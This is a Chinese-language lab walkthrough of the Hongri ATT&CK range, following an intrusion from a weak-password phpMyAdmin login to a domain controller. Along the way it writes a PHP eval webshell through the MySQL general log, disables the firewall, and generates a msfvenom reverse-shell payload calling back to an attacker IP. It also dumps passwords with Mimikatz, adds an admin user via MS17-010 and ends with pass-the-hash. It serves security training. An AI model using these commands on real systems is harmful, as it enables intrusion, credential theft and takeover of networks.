红日靶场
红日靶场-ATT&CK实战(一)
配置如图
拓扑图.png)
nmap扫描我们部署Web服务的主机
有两个开放的端口,扫描其对应挂载的服务
爆破路径
存在后台登录页面:http://192.168.72.128/phpMyAdmin/
尝试弱口令(root/root)成功登录:
查询MySQL数据库的通用日志
得到路径C:1.log下的日志文件
我们考虑将日志文件放到站点根目录,并改为.php文件后缀
构造sql查询,通过sql查询往日志文件中写入我们的php命令,进而get shell提权
这里需要注意开启general_log读取功能,使我们每一条查询都出现在日志文件里面,这样才能成功写php日志马
1 | SET GLOBAL general_log='on'; |
输入构造的shell命令:SELECT '<?php eval($_POST["shell"]);?>'
蚁剑成功连上
尝试关掉防火墙(建议手敲命令进去):
1 | netsh advfirewall set domainprofile state off |
重新打开通过Cobalt Strike生成的可执行Stager Payload
看到我们的跳板机已经上线
Mimikatz抓到主机密码
net view看到内网的两台主机
现在我们完善域画像构建:
借助有Web服务的Windows7为跳板机,搭建反向代理,作为跳板提供给攻击机,使其能进入到内网,进一步横向渗透到内网的两台主机
首先我们尝试对域控主机提权,我们采用 MSF 作为主要工具,因其相对于Cobalt Strike来说,集成了更强大的功能模块和脚本
通过msfvenom生成后门
1 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.196.128 LPORT=1234 -f exe -o shell.exe |
msfconsole反弹shell
1 | use exploit/multi/handler |
这里我们先background把当前会话移至后台(后续可执行sessions
-i 1重新回到该会话)
然后我们添加内网路由,并挂上socks 4a代理
1 | run get_local_subnets |
测试是否能访问到内网192.168.52.0网段
nmap扫描第一台主机端口
1 | proxychains nmap -p 80,135-139,445,3306,3389 -Pn -sT 192.168.52.141 |
确定是Windows 2003的机器
尝试漏扫
1 | proxychains nmap --script=vuln 192.168.52.141 |
那我们可利用ms17-010创建用户
1 | use auxiliary/admin/smb/ms17_010_command |
添加管理员权限
1 | set command net localgroup administrators Cyr1s /add |
尝试打开23端口telnet服务
1 | set COMMAND sc config tlntsvr start= auto |
看到已经成功开启telnet服务
利用telnet进行连接
1 | use auxiliary/scanner/telnet/telnet_login |
但这里我们通过 auxiliary/scanner/telnet/telnet_login
模块获得的是一个原始 Telnet
连接,并未在目标机上分配交互式命令解释器(PTY),故该连接只转发了输入的字符并重复在回显上
成功拿下这台主机权限
然后按照之前同样的思路打另一台即域控主机
但这次没有成功开启telnet服务,猜测是对方主机未安装telnet服务
回到Cobalt Strike,我们通过哈希传递攻击,最终成功拿到域控主机shell
